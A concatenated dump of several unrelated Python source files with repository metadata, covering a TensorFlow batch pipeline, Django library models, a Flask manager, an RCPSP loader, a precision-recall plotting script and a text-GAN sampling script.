        *episode, chunk_sizes=chunk_sizes, image_size=image_size), source_id

  dataset = dataset.map(map_fn)
  # Overlap episode processing and training.
  dataset = dataset.prefetch(1)
  return dataset
def make_one_source_batch_pipeline(dataset_spec,
                                   split,
                                   batch_size,
                                   pool=None,
                                   shuffle_buffer_size=None,
                                   read_buffer_size_bytes=None,
                                   num_prefetch=0,
                                   image_size=None,
                                   num_to_take=None):
  """Returns a pipeline emitting data from one single source as Batches.

  Args:
    dataset_spec: A DatasetSpecification object defining what to read from.
    split: A learning_spec.Split object identifying the source split.
    batch_size: An int representing the max number of examples in each batch.
    pool: String (optional), for example-split datasets, which example split
      to use ('valid', or 'test'), used at meta-test time only.
    shuffle_buffer_size: int or None, number of examples in the buffer used
      for shuffling the examples from different classes, while they are
      mixed together. There is only one shuffling operation, not one per
      class.
    read_buffer_size_bytes: int or None, buffer size for each
      TFRecordDataset.
    num_prefetch: int, number of examples to prefetch per class; no
      prefetching if < 1.
    image_size: int, desired image size used during decoding.
    num_to_take: Optional int; if given, restricts each class to that many
      examples from its tfrecord. By default all data is used.

  Returns:
    A Dataset instance that outputs decoded batches from all classes in the
    split.
  """
  take = -1 if num_to_take is None else num_to_take
  batch_reader = reader.BatchReader(dataset_spec, split, shuffle_buffer_size,
                                    read_buffer_size_bytes, num_prefetch,
                                    take)
  dataset = batch_reader.create_dataset_input_pipeline(
      batch_size=batch_size, pool=pool)
  dataset = dataset.map(
      functools.partial(process_batch, image_size=image_size))
  # Single source: zip every batch with constant source ID 0 for interface
  # consistency with the multisource pipeline.
  source_ids = tf.data.Dataset.from_tensors(0).repeat()
  dataset = tf.data.Dataset.zip((dataset, source_ids))
  # Overlap batch processing and training.
  return dataset.prefetch(1)
# TODO(lamblinp): Update this option's name
@gin.configurable('BatchSplitReaderGetReader', whitelist=['add_dataset_offset'])
def make_multisource_batch_pipeline(dataset_spec_list,
                                    split,
                                    batch_size,
                                    add_dataset_offset,
                                    pool=None,
                                    shuffle_buffer_size=None,
                                    read_buffer_size_bytes=None,
                                    num_prefetch=0,
                                    image_size=None,
                                    num_to_take=None):
  """Returns a pipeline emitting data from multiple source as Batches.

  Args:
    dataset_spec_list: A list of DatasetSpecification, one for each source.
    split: A learning_spec.Split object identifying the source split.
    batch_size: An int representing the max number of examples in each batch.
    add_dataset_offset: A Boolean, whether to add an offset to each dataset's
      targets, so that each target is unique across all datasets.
    pool: String (optional), for example-split datasets, which example split
      to use ('valid', or 'test'), used at meta-test time only.
    shuffle_buffer_size: int or None, number of examples in the buffer used
      for shuffling the examples from different classes, while they are
      mixed together. There is only one shuffling operation, not one per
      class.
    read_buffer_size_bytes: int or None, buffer size for each
      TFRecordDataset.
    num_prefetch: int, number of examples to prefetch per class; no
      prefetching if < 1.
    image_size: int, desired image size used during decoding.
    num_to_take: Optional list, per-dataset number of examples per class to
      restrict to (for this split). If provided, its length must equal
      len(dataset_spec_list); if None, all data per class is used.

  Returns:
    A Dataset instance that outputs decoded batches from all classes in the
    split.

  Raises:
    ValueError: if `num_to_take` has the wrong length.
  """
  if num_to_take is not None and len(num_to_take) != len(dataset_spec_list):
    raise ValueError('num_to_take does not have the same length as '
                     'dataset_spec_list.')
  if num_to_take is None:
    num_to_take = [-1] * len(dataset_spec_list)
  sources = []
  offset = 0
  for source_id, (dataset_spec, take) in enumerate(
      zip(dataset_spec_list, num_to_take)):
    batch_reader = reader.BatchReader(dataset_spec, split, shuffle_buffer_size,
                                      read_buffer_size_bytes, num_prefetch,
                                      take)
    dataset = batch_reader.create_dataset_input_pipeline(
        batch_size=batch_size, pool=pool, offset=offset)
    # Zip each batch with its source ID so downstream consumers can tell
    # where the data came from.
    source_ids = tf.data.Dataset.from_tensors(source_id).repeat()
    sources.append(tf.data.Dataset.zip((dataset, source_ids)))
    if add_dataset_offset:
      # Shift the next dataset's targets past this one's class range.
      offset += len(dataset_spec.get_classes(split))
  # Sample uniformly among sources.
  dataset = tf.data.experimental.sample_from_datasets(sources)

  def map_fn(batch, source_id):
    return process_batch(*batch, image_size=image_size), source_id

  dataset = dataset.map(map_fn)
  # Overlap batch processing and training.
  return dataset.prefetch(1)
|
[
"[email protected]"
] | |
e6f10d75225da6821b418260301e574f90c67f2f
|
0e1f38e205ce9a8fe2dd848cc81e29fe6bcf315e
|
/catalog/models.py
|
3b40f62ac087da15a99bf416c6d706bb9b83b93c
|
[] |
no_license
|
TimothySeahGit/django-library-test
|
c62f49a31a0e86449771d84e135a687f5e685f0f
|
fc4d3d7c86aab645c3faef270dc01fe995e9ba6b
|
refs/heads/master
| 2022-12-14T07:38:21.618018 | 2019-05-28T03:47:42 | 2019-05-28T03:47:42 | 188,566,746 | 0 | 0 | null | 2022-12-08T05:10:31 | 2019-05-25T12:59:47 |
Python
|
UTF-8
|
Python
| false | false | 4,427 |
py
|
# Used to generate URLs by reversing the URL patterns
import uuid # Required for unique book instances
from django.urls import reverse
from django.db import models
from django.contrib.auth.models import User
from datetime import date
# Create your models here.
class Genre(models.Model):
    """Model representing a book genre (e.g. Science Fiction)."""

    # Free-text genre name entered by library staff.
    name = models.CharField(
        max_length=200, help_text='Enter a book genre (e.g. Science Fiction)')

    def __str__(self):
        """Return the genre name."""
        return self.name
class Language(models.Model):
    """Model representing a Language (e.g. English, French, Japanese)."""

    # Natural language the book is written in.
    name = models.CharField(max_length=200,
                            help_text="Enter the book's natural language (e.g. English, French, Japanese etc.)")

    def __str__(self):
        """Return the language name."""
        return self.name
class Book(models.Model):
    """Model representing a book (but not a specific copy of a book)."""

    title = models.CharField(max_length=200)
    # One author per book; an author may have many books. 'Author' is given
    # as a string because that class is declared later in this module.
    author = models.ForeignKey('Author', on_delete=models.SET_NULL, null=True)
    summary = models.TextField(
        max_length=1000, help_text='Enter a brief description of the book')
    isbn = models.CharField(
        'ISBN', max_length=13, help_text='13 Character <a href="https://www.isbn-international.org/content/what-isbn">ISBN number</a>')
    # Many-to-many: a book can cover several genres and a genre contains
    # many books. Genre is already defined, so the class object is used.
    genre = models.ManyToManyField(
        Genre, help_text='Select a genre for this book')
    language = models.ForeignKey(
        'Language', on_delete=models.SET_NULL, null=True)

    def __str__(self):
        """Return the book title."""
        return self.title

    def get_absolute_url(self):
        """Return the URL of the detail view for this book."""
        return reverse('book-detail', args=[str(self.id)])

    def display_genre(self):
        """Return up to three genre names, comma-separated (for Admin)."""
        return ', '.join(g.name for g in self.genre.all()[:3])

    display_genre.short_description = 'Genre'
class BookInstance(models.Model):
"""Model representing a specific copy of a book (i.e. that can be borrowed from the library)."""
id = models.UUIDField(primary_key=True, default=uuid.uuid4,
help_text='Unique ID for this particular book across whole library')
book = models.ForeignKey('Book', on_delete=models.SET_NULL, null=True)
imprint = models.CharField(max_length=200)
due_back = models.DateField(null=True, blank=True)
borrower = models.ForeignKey(
User, on_delete=models.SET_NULL, null=True, blank=True)
LOAN_STATUS = (
('m', 'Maintenance'),
('o', 'On loan'),
('a', 'Available'),
('r', 'Reserved'),
)
status = models.CharField(
max_length=1,
choices=LOAN_STATUS,
blank=True,
default='m',
help_text='Book availability',
)
class Meta:
ordering = ['due_back']
permissions = (("can_mark_returned", "Set book as returned"),)
def __str__(self):
"""String for representing the Model object."""
return f'{self.id} ({self.book.title})'
@property
def is_overdue(self):
if self.due_back and date.today() > self.due_back:
return True
return False
class Author(models.Model):
"""Model representing an author."""
first_name = models.CharField(max_length=100)
last_name = models.CharField(max_length=100)
date_of_birth = models.DateField(null=True, blank=True)
date_of_death = models.DateField('died', null=True, blank=True)
class Meta:
ordering = ['last_name', 'first_name']
def get_absolute_url(self):
"""Returns the url to access a particular author instance."""
return reverse('author-detail', args=[str(self.id)])
def __str__(self):
"""String for representing the Model object."""
return f'{self.last_name}, {self.first_name}'
|
[
"[email protected]"
] | |
5819b270315da9ad336332e32b0db0c3aa3325a1
|
f55e6d86adc4155e99f8a2047a297cf0b3277616
|
/manager.py
|
a7756f495ef2b167481f9379d160f8e6033ba998
|
[] |
no_license
|
DengZY123/sunners
|
1d87fdef3abda2c814a9ae587e4cf03a9ac23263
|
46b822fe915b2559df407126951db73857844537
|
refs/heads/master
| 2023-02-28T12:12:23.170118 | 2021-02-07T10:21:19 | 2021-02-07T10:21:19 | 271,981,338 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 532 |
py
|
from flask_script import Server
import sys
sys.path.append('../')
from application import manager
from application import app
import www
#manager.add_command("runserver",Server(port=app.config['SERVER_PORT'],use_debugger=True,use_reloader=True))
manager.add_command("runserver",Server(port=8999,use_debugger=True ,use_reloader=True))
def main():
manager.run()
if __name__ == "__main__":
try:
import sys
sys.exit(main())
except Exception as e:
import tranceback
tranceback.print_exc()
|
[
"[email protected]"
] | |
a8ba14a006fb88ac5415201cfab9678983738d9d
|
b47f2e3f3298388b1bcab3213bef42682985135e
|
/experiments/fdtd-2d/tmp_files/2238.py
|
6dfcdd1cd9629a3c959c2e3b61310de6617d05bf
|
[
"BSD-2-Clause"
] |
permissive
|
LoopTilingBenchmark/benchmark
|
29cc9f845d323431e3d40e878cbfc6d1aad1f260
|
52a3d2e70216552a498fd91de02a2fa9cb62122c
|
refs/heads/master
| 2020-09-25T09:45:31.299046 | 2019-12-04T23:25:06 | 2019-12-04T23:25:06 | 225,975,074 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 411 |
py
|
from chill import *
source('/uufs/chpc.utah.edu/common/home/u1142914/lib/ytopt_vinu/polybench/polybench-code/stencils/fdtd-2d/kernel.c')
destination('/uufs/chpc.utah.edu/common/home/u1142914/lib/ytopt_vinu/experiments/fdtd-2d/tmp_files/2238.c')
procedure('kernel_fdtd_2d')
loop(0)
known(' nx > 1 ')
known(' ny > 1 ')
tile(1,2,20,2)
tile(1,4,16,4)
tile(2,2,20,2)
tile(2,4,16,4)
tile(3,2,20,2)
tile(3,4,16,4)
|
[
"[email protected]"
] | |
e1fb60594b9677bac8acc8141bfa22fb1dceca1e
|
e8734347fbd04af9372c532627271cd163594378
|
/registration/models.py
|
fbd2602b7b028b1b9768cb917ebadc6f735bb692
|
[] |
no_license
|
sreeja-g/ichoose_e_commerce
|
fcbb539d6a1667cc429f5de17a25155b92d3ef71
|
fa8935f6cb078d83a2461cd17dca7087e33140ee
|
refs/heads/master
| 2020-12-23T19:54:03.933418 | 2020-03-07T21:21:38 | 2020-03-07T21:21:38 | 237,254,799 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 454 |
py
|
from djongo import models
from django.contrib.auth.models import AbstractUser
class User(AbstractUser):
mobile = models.CharField(max_length=16)
address = models.TextField()
bank_details=models.TextField()
verification_status=models.BooleanField(default=False)
verification_applied = models.BooleanField(default=False)
email = models.EmailField(max_length=254, unique=True)
def __str__(self):
return self.username
|
[
"[email protected]"
] | |
694debae9d0c3be37bb1ceb195eb5416f77e203d
|
8bc02f1e939c5802606f1776afe28e7288521c3a
|
/mifiel/document.py
|
e2d0d024da5d40e0a7bc3b3a2d7f12dc40d398e5
|
[
"MIT"
] |
permissive
|
krriyo/python-api-client
|
4b224e5025f191c1494808655b18f14aedde2a3a
|
fb4e37382ca9e2f65e36d344d91c4edafeeec1dd
|
refs/heads/master
| 2021-01-16T19:53:32.110635 | 2016-06-13T15:08:05 | 2016-06-13T15:10:23 | 61,143,710 | 0 | 0 | null | 2016-06-14T17:51:14 | 2016-06-14T17:51:14 | null |
UTF-8
|
Python
| false | false | 827 |
py
|
from mifiel import Base
class Document(Base):
def __init__(self, client):
Base.__init__(self, client, 'documents')
@staticmethod
def find(client, doc_id):
doc = Document(client)
doc.process_request('get', url=doc.url(doc_id))
return doc
@staticmethod
def create(client, signatories, file=None, dhash=None, callback_url=None):
if not file and not dhash:
raise ValueError('Either file or hash must be provided')
if file and dhash:
raise ValueError('Only one of file or hash must be provided')
data = { 'signatories': signatories }
if callback_url:
data['callback_url'] = callback_url
if file:
data['file'] = open(file)
if dhash:
data['original_hash'] = dhash
doc = Document(client)
doc.process_request('post', data=data)
return doc
|
[
"[email protected]"
] | |
c4730fe7b6b349a796fd414431f490ab99e64b94
|
1cc79da2b428403981b145c4ba2934c85e73440b
|
/code/load_instance.py
|
e6221bfb7d938b9836a9b759c8bbc673a72c82f2
|
[] |
no_license
|
Iggytung/two-stage-robust-RCPSP
|
3bd41b264a208bdf28ed76e9f9cb849a1c8540b7
|
94e7bc23e0ee82574335f11850a554766a85f673
|
refs/heads/master
| 2023-01-13T07:01:28.679534 | 2020-11-12T14:19:05 | 2020-11-12T14:19:05 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,990 |
py
|
import re
import os
def load_instance(path_to_file):
f = open(path_to_file, 'r')
raw_lines = f.read().splitlines()
f.close()
data = {'E':{}, 'd':[], 'r':[]}
line_counter = 0
for line in raw_lines:
ints = list(map(int, re.findall(r'\d+', line))) #list of integers in line
if len(ints) == 0:
line_counter += 1
continue
else:
if line_counter < 18:
if 'jobs' in line:
data['n'] = int(ints[0]) #number of activities (incl. dummy act's 0, n+1)
elif 'horizon' in line:
data['T'] = int(ints[0]) #UB on makespan
elif '- renewable' in line:
data['n_res'] = int(ints[0])
elif 18 <= line_counter < 18+data['n']:
jobnr = int(ints[0])-1
data['E'][jobnr] = [int(succ)-1 for succ in ints[3:]] #ints[3:] = successors
elif 18+data['n']+4 <= line_counter < 18+2*data['n']+4:
data['d'].append(int(ints[2]))
data['r'].append([int(x) for x in ints[3:]])
elif line_counter == 18+2*data['n']+4+3:
data['R'] = [int(x) for x in ints]
line_counter += 1
activities = {}
for j in range(data['n']):
pred = [i for i in range(j) if j in data['E'][i]]
act = Activity(j, pred, data['E'][j], data['d'][j], data['r'][j])
activities[j] = act
project_name = os.path.basename(os.path.normpath(os.path.splitext(path_to_file)[0]))
project = Project(project_name, activities, data['R'], data['T'])
return project
class Activity():
def __init__(self, id, pred, succ, d, r):
self.id = id
self.pred = pred #predecessors
self.succ = succ #successors
self.d = d #duration
self.r = r #resource requirement
class Project():
def __init__(self, name, act, R, T):
self.name = name
self.act = act
self.V = [i for i in act] #activities
self.E = [(i,j) for i in self.V for j in act[i].succ] #edges
self.n = len(act)-2 #number of non-dummy activities
self.R = R #resource availability
self.K = range(len(R))
self.T = T #UB on makespan (sum of activity durations)
self.forward_pass()
self.backward_pass()
#computes ES and EF for each activity
def forward_pass(self):
n = self.n
self.act[0].ES = 0
self.act[0].EF = 0
for j in range(1,n+2):
self.act[j].ES = max(self.act[i].EF for i in self.act[j].pred)
self.act[j].EF = self.act[j].ES + self.act[j].d
#computes LF and LS for each activity
def backward_pass(self):
n = self.n
self.act[n+1].LF = self.T
self.act[n+1].LS = self.T
for j in range(n,-1,-1):
self.act[j].LF = min(self.act[i].LS for i in self.act[j].succ)
self.act[j].LS = self.act[j].LF - self.act[j].d
|
[
"[email protected]"
] | |
f4fe9baf658f7699c56553c9b11e5a857db45443
|
f5e028f74d682da8b299c2bac3abb825ee689594
|
/groups/migrations/0005_grouppost.py
|
776b055a2f6e5d840d8eada6fa255f2656c16f36
|
[] |
no_license
|
pidoxy/Insight
|
ac0bd5641d3e59d633b1b62293017b7069107ebc
|
c7abf64ef425d96af887abd220c90c340970410c
|
refs/heads/main
| 2023-07-12T03:18:16.520733 | 2021-08-16T09:20:49 | 2021-08-16T09:20:49 | 396,128,334 | 0 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,277 |
py
|
# Generated by Django 3.2 on 2021-05-26 18:07
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('groups', '0004_rename_profile_background_group_cover'),
]
operations = [
migrations.CreateModel(
name='GroupPost',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('content', models.TextField()),
('image', models.ImageField(blank=True, null=True, upload_to='uploads/groupposts')),
('timestamp', models.DateTimeField(auto_now=True)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='posts', to=settings.AUTH_USER_MODEL)),
('group', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='groupposts', to='groups.groupmember')),
],
options={
'ordering': ['-timestamp'],
'unique_together': {('author', 'content')},
},
),
]
|
[
"[email protected]"
] | |
1d21b813ebb1d0d0419342b2aedcf2c3f52774cf
|
d157356a92d6fee8665d66cfe6b270c8f18f9159
|
/ex_python/ex_1_100/exercise_16_20.py
|
e7010bd8078fb7e4ff8ba92093247459bff9a305
|
[] |
no_license
|
ycl-initVersion/ExerciseCodeCollect
|
a52622c16f51d9189293bb854b7711223f6f9c77
|
11b9c8fce262a2c6f9b43d10c1c03fa994068d53
|
refs/heads/master
| 2021-01-18T06:09:27.000140 | 2016-09-19T06:25:24 | 2016-09-19T06:25:24 | 68,558,652 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,505 |
py
|
#example 16
'''
import datetime
if __name__ == '__main__':
print(datetime.date.today().strftime('%d/%m/%Y'))
miyazakiBirthDate = datetime.date(1941,1,5)
print(miyazakiBirthDate.strftime('%d/%m/%Y'))
miyazakiBirthNextDay = miyazakiBirthDate + datetime.timedelta(days=1)
print(miyazakiBirthNextDay.strftime('%d/%m/%Y'))
miyazakiFirstBirthDate = miyazakiBirthDate.replace(year=miyazakiBirthDate.year+1)
print(miyazakiFirstBirthDate.strftime('%d/%m/%Y'))
'''
#example 17
'''
import string
s = raw_input('input a string:\n')
letters = 0
space = 0
digit = 0
others = 0
for c in s:
if c.isalpha():
letters += 1
elif c.isspace():
space += 1
elif c.isdigit():
digit += 1
else:
others += 1
print 'char = %d,space = %d,digit = %d,others = %d' %(letters,space,digit,others)
'''
#exaple 18
'''
Tn = 0
Sn = []
n = int(raw_input('n = :\n'))
a = int(raw_input('a= :\n'))
for count in range(n):
Tn = Tn + a
a = a * 10
Sn.append(Tn)
print Tn
Sn = reduce(lambda x,y:x + y,Sn)
print Sn
'''
#example 19
'''
from sys import stdout
for j in range(2,1001):
k = []
n = -1
s = j
for i in range(1,j):
if j % i == 0:
n += 1
s -= i
k.append(i)
if s == 0:
print j
for i in range(n):
stdout.write(str(k[i]))
stdout.write(' ')
print k[n]
'''
#example 20
Sn = 100.0
Hn = Sn / 2
for n in range(2,11):
Sn += 2*Hn
Hn /=2
print 'total of road is %f' %Sn
print 'the tenth of %f meter' %Hn
|
[
"[email protected]"
] | |
b854b2f33147ed15e806a984140b33a8a77e76fe
|
562384347373c3ae872a380e3d2363fbbbe0a5b3
|
/mpr_curves.py
|
c69ac35e2b899d12803af5570e2c60bf74299c74
|
[] |
no_license
|
XingCui666/scripts
|
22df26d072648557bdddc66c93d52d45bab64c7e
|
4f7488fd37ff0bf4f9bf78e93711a058885655c7
|
refs/heads/master
| 2022-04-14T15:46:24.407738 | 2020-03-24T04:30:53 | 2020-03-24T04:30:53 | 159,750,624 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 8,172 |
py
|
# Created by Kuan Li
import json
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
from tqdm import tqdm
import sys
import os
IOU_TH_50 = 0.5
IOU_THS = [i / 20 + 0.5 for i in range(9, -1, -1)]
class Dt:
def __init__(self, img_id, score, bbox, mode="mPR"):
"""
single dt
:param img_id:
:param score: a list of score
:param bbox: bbox
"""
self.img_id = img_id
self.score = score
self.bbox = bbox
if mode == "PR50":
self.is_match = False
else:
self.is_match = [False for _ in range(9, -1, -1)] # 0.95-->0.5
class Gt:
def __init__(self, img_id, bbox, mode="mPR"):
"""
a gt contains a list of gt bboxes
:param img_id:
:param bbox: a list of bboxes
"""
self.img_id = img_id
self.bbox = bbox
if mode == "PR50":
self.is_match = False
else:
self.is_match = [False for _ in range(9, -1, -1)] # 0.95-->0.5
def compute_iou(bbox1, bbox2):
x1, y1, w1, h1 = bbox1
x2, y2, w2, h2 = bbox2
s_sum = w1 * h1 + w2 * h2
left = max(x1, x2)
right = min(x1 + w1, x2 + w2)
top = max(y1, y2)
bottom = min(y1 + h1, y2 + h2)
if left >= right or top >= bottom:
return 0
intersect = (right - left) * (bottom - top)
return intersect / (s_sum - intersect)
def prepare_gt_and_dt(gt_path, dt_path, c_id):
"""
:param gt_path: gt path
:param dt_path: dt path
:param c_id: category_id
:return: gt dict and dt list
"""
with open(gt_path, "r") as f:
gt = json.load(f)
gt_objs = gt["annotations"]
gt_imgs = gt["images"]
gt_objs = [an for an in gt_objs if an["category_id"] == c_id]
gt_num = len(gt_objs)
gt_dic = dict() # key: image_id value: a list of Gt
for demo in gt_objs:
if demo["image_id"] in gt_dic:
tmp = Gt(img_id=demo["image_id"], bbox=demo["bbox"], mode=mode)
gt_dic[demo["image_id"]].append(tmp)
else:
gt_dic[demo["image_id"]] = [Gt(img_id=demo["image_id"], bbox=demo["bbox"], mode=mode)]
# TODO image_id_set should from "images", not "annotations", Done.
# image_id_set = gt_dic.keys() #
image_id_set = set([im["id"] for im in gt_imgs])
with open(dt_path, "r") as f:
dt_objs = json.load(f)
dt_objs = [demo for demo in dt_objs
if demo["category_id"] == c_id and demo["image_id"] in image_id_set]
dt_list = list()
for demo in dt_objs:
dt_list.append(Dt(img_id=demo["image_id"], score=demo["score"], bbox=demo["bbox"], mode=mode))
return gt_dic, dt_list, gt_num
def match_dt_2_gt(single_dt, gts, mode="mPR"):
"""
:param single_dt:
:param gts: a list of gt
:param mode:
:return:
"""
if mode == "PR50":
max_iou = 0
max_index = -1
for index, gt in enumerate(gts):
if not gt.is_match:
cur_iou = compute_iou(single_dt.bbox, gt.bbox)
if cur_iou >= IOU_TH_50 and max_iou < cur_iou:
max_index = index
max_iou = cur_iou
if max_index >= 0:
single_dt.is_match = True
gts[max_index].is_match = True
else:
for thres_index, thres in enumerate(IOU_THS): #first match high score
max_iou = 0
max_index = -1
for index, gt in enumerate(gts):
if not gt.is_match[thres_index]:
cur_iou = compute_iou(single_dt.bbox, gt.bbox)
if cur_iou >= thres and max_iou < cur_iou:
max_index = index
max_iou = cur_iou
if max_index >= 0:
single_dt.is_match[thres_index] = True
gts[max_index].is_match[thres_index] = True
def run_match(dt_list, gt_dict, mode):
"""
:param dt_list: a list of Dt class
:param gt_dict: key: image_id value: Gt class
:return:
"""
dt_list.sort(key=lambda x: x.score, reverse=True)
# sorted(dt_list, key=lambda x: x.score)
print("matching dt to gts...")
for single_dt in tqdm(dt_list):
img_id = single_dt.img_id
# TODO img_id is exists ? Done.
if img_id in gt_dic:
match_dt_2_gt(single_dt, gt_dict[img_id], mode=mode)
def get_recalls_and_precisions(dt_list, gt_num, mode="mPR"):
"""
recall: tp / gt_all; precision: tp/ dt_all
:param dt_list:
:param gt_num:
:return:
"""
if mode == "PR50":
is_match = [dt.is_match for dt in dt_list]
scores = [dt.score for dt in dt_list]
tp_list = []
cur_tp = 0
for match in is_match:
if match:
cur_tp += 1
tp_list.append(cur_tp)
recalls = [(tp / gt_num) * 100 for tp in tp_list]
precisions = [(tp / (index + 1)) * 100 for index, tp in enumerate(tp_list)]
return recalls, precisions, scores
else:
recalls_all = [0 for _ in dt_list]
precisions_all = [0 for _ in dt_list]
scores = [dt.score for dt in dt_list]
for index, thres in enumerate(IOU_THS):
is_match = [dt.is_match[index] for dt in dt_list]
tp_list = []
cur_tp = 0
for match in is_match:
if match:
cur_tp += 1
tp_list.append(cur_tp)
recalls = [(tp / gt_num) * 100 for tp in tp_list]
precisions = [(tp / (index + 1)) * 100 for index, tp in enumerate(tp_list)]
recalls_all = [recalls_all[i]+recalls[i] for i in range(len(dt_list))]
precisions_all = [precisions_all[i]+precisions[i] for i in range(len(dt_list))]
recalls_all = [recall/len(IOU_THS) for recall in recalls_all]
precisions_all = [precision/len(IOU_THS) for precision in precisions_all]
return recalls_all, precisions_all, scores
def get_thres_index(scores, score_thres):
indics = []
for thres in score_thres:
for index, score in enumerate(scores):
if score < thres:
indics.append(index)
break
return indics
if __name__ == '__main__':
gt_coco = sys.argv[1]
result1_json = sys.argv[2]
result2_json = sys.argv[3]
benchmark = sys.argv[4]
gt_path = gt_coco
dt_paths = [result1_json, result2_json]
colors = ['red', 'green', 'blue', "cyan", "brown", "black", "orange"] # default color
labels = ['v6.1_nnie', 'v6.2_nnie'] # same length as dt_paths
c_id = 1 # filter category_id
c_labels = {1: "body", 2: "head", 3: "face"}
mode = "mPR" # mPR or PR50
#score_thres = [0.8, 0.7, 0.6, 0.5, 0.4, 0.3, 0.2] # suggestion: descend, plot some key points
#score_marker = ["o", "v", "+", "s", ">", "*", "<"] # marker
score_thres = [0.8, 0.7, 0.6, 0.5] # suggestion: descend, plot some key points
score_marker = ["o", "v", "+", "s"] # marker
for index, dt_path in enumerate(dt_paths):
print("handling {} prlines...".format(labels[index]))
gt_dic, dt_list, gt_num = prepare_gt_and_dt(gt_path, dt_path, c_id)
run_match(dt_list, gt_dic, mode=mode)
recalls, precisions, scores = get_recalls_and_precisions(dt_list, gt_num, mode=mode)
plt.plot(recalls, precisions, linewidth=0.8, color=colors[index], label=labels[index])
indics = get_thres_index(scores, score_thres)
for i, num in enumerate(indics):
plt.scatter(recalls[num], precisions[num], c=colors[index], linewidths=1, marker=score_marker[i])
start_pos = (5, 75)
for i, score in enumerate(score_thres):
plt.text(start_pos[0], start_pos[1]-2*i, "score: {} --> {}".format(score, score_marker[i]))
plt.legend()
plt.xlabel("recalls")
plt.ylabel("precisions")
title = c_labels[c_id] if c_id in c_labels else "unknown"
des_saved = "./prlines_{}_test_{}.png".format(title, benchmark)
plt.title("{} {} on {}".format(title, mode, benchmark))
plt.savefig(des_saved)
plt.show()
print("done")
|
[
"[email protected]"
] | |
3ec8c9a9aafd5ce250c96413e44240d1a277bb9b
|
e8bfb2f17d014d2d71325192ec16385d6e504980
|
/sample_run_12.py
|
b489f2f2315c548ccb85cb43037ff04e1368ec7d
|
[] |
no_license
|
HarikrishnanBalagopal/useful_scripts
|
7fabaa7bd7d041cbce1d53b83424300a4ae39944
|
33e2d27e8cc2143b4392b7a06168a4112f9b614e
|
refs/heads/master
| 2022-08-02T03:30:32.748904 | 2020-06-03T14:36:18 | 2020-06-03T14:36:18 | 267,655,704 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 4,813 |
py
|
import os
import json
import torch
import numpy as np
import matplotlib.pyplot as plt
from torch import nn, optim
from tqdm.notebook import tqdm
from scipy.stats import truncnorm
from argparse import ArgumentParser
from text_encoder import TextEncoder
from text_decoder import TextDecoder
from easydict import EasyDict as edict
from fast_self_bleu import all_self_bleu
from fast_bleu import all_bleu_with_common_refs
from latent_discriminator import LatentDiscriminator, SimpleLatentDiscriminator
from latent_generator import LatentGenerator, SimpleLatentGenerator1, SimpleLatentGenerator2
from text_datasets import get_quora_texts_pretrained_vocab, get_emnlp_2017_news_pretrained_vocab
from utils import to_one_hot, QUORA_TEXT_PRETRAINED_VOCAB_VALID_SET_PATH, EMNLP_2017_NEWS_PRETRAINED_VOCAB_VALID_SET_PATH
def run(args):
d_batch = 512
d_noise = 100
d_vocab = 27699
d_gen_layers = 1
gen_dropout = 0.5
d_max_seq_len = 26
d_gen_hidden = 512
d_dis_hidden = 512
d_text_feature = 512
d_text_enc_cnn = 512
d_text_enc_cnn = 512
text_enc_dropout = 0.5
output_dir = args.output_dir
interpolation_steps = d_batch
lat_gen_weights_path = args.weights_path
text_enc_weights_path = 'new_text_enc.pth'
text_dec_weights_path = 'faster_text_gen_v1.pth'
truncation_threshold = args.truncation_threshold
if truncation_threshold is not None:
assert truncation_threshold > 0.0, f'truncation_threshold must be positive'
truncated_normal = truncnorm(-truncation_threshold, truncation_threshold)
print('using truncation trick with threshold:', truncation_threshold)
os.makedirs(output_dir, exist_ok=True)
device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')
dataset, loader = get_quora_texts_pretrained_vocab(split='train', d_batch=d_batch, should_pad=True, pad_to_length=d_max_seq_len)
assert d_vocab == dataset.d_vocab
end_token = dataset.end_token
text_dec = TextDecoder(d_vocab=d_vocab, d_text_feature=d_text_feature, d_gen_hidden=d_gen_hidden, d_max_seq_len=d_max_seq_len, d_gen_layers=d_gen_layers, gen_dropout=gen_dropout, pad_token=dataset.pad_token, start_token=dataset.start_token, end_token=dataset.end_token).to(device)
text_dec.load_state_dict(torch.load(text_dec_weights_path))
lat_gen = LatentGenerator(d_noise=d_noise, d_text_feature=d_text_feature, d_gen_hidden=d_gen_hidden).to(device)
lat_gen.load_state_dict(torch.load(lat_gen_weights_path))
# lat_gen = SimpleLatentGenerator1(d_noise=d_noise, d_text_feature=d_text_feature, d_gen_hidden=d_gen_hidden).to(device)
# lat_gen = SimpleLatentGenerator2(d_noise=d_noise, d_text_feature=d_text_feature, d_gen_hidden=d_gen_hidden).to(device)
text_dec.eval()
lat_gen.eval()
def remove_helper(xs):
xs = xs[1:]
for i, x in enumerate(xs):
if x == end_token:
return xs[:i]
return xs
def remove_special_tokens(xss):
if isinstance(xss, torch.Tensor):
xss = xss.tolist()
return [remove_helper(xs) for xs in xss]
def get_avg_std_bleu(xss):
xss = list(zip(*xss))
return [(np.mean(xs), np.std(xs)) for xs in xss]
print('generate fake texts:')
fake_text_ints = []
fake_text_strs = []
num_generated = 0
num_samples = args.num_samples
with torch.no_grad():
while num_generated < num_samples:
if truncation_threshold is not None:
noises = torch.tensor(truncated_normal.rvs((d_batch, d_noise)), dtype=torch.float, device=device)
else:
noises = torch.randn(d_batch, d_noise, device=device)
fake_texts = text_dec(lat_gen(noises))[0]
fake_text_ints.extend(fake_texts.tolist())
fake_text_strs.extend([dataset.decode_caption(fake_text) for fake_text in fake_texts.cpu()])
num_generated += d_batch
print('\n'.join(fake_text_strs[:4]))
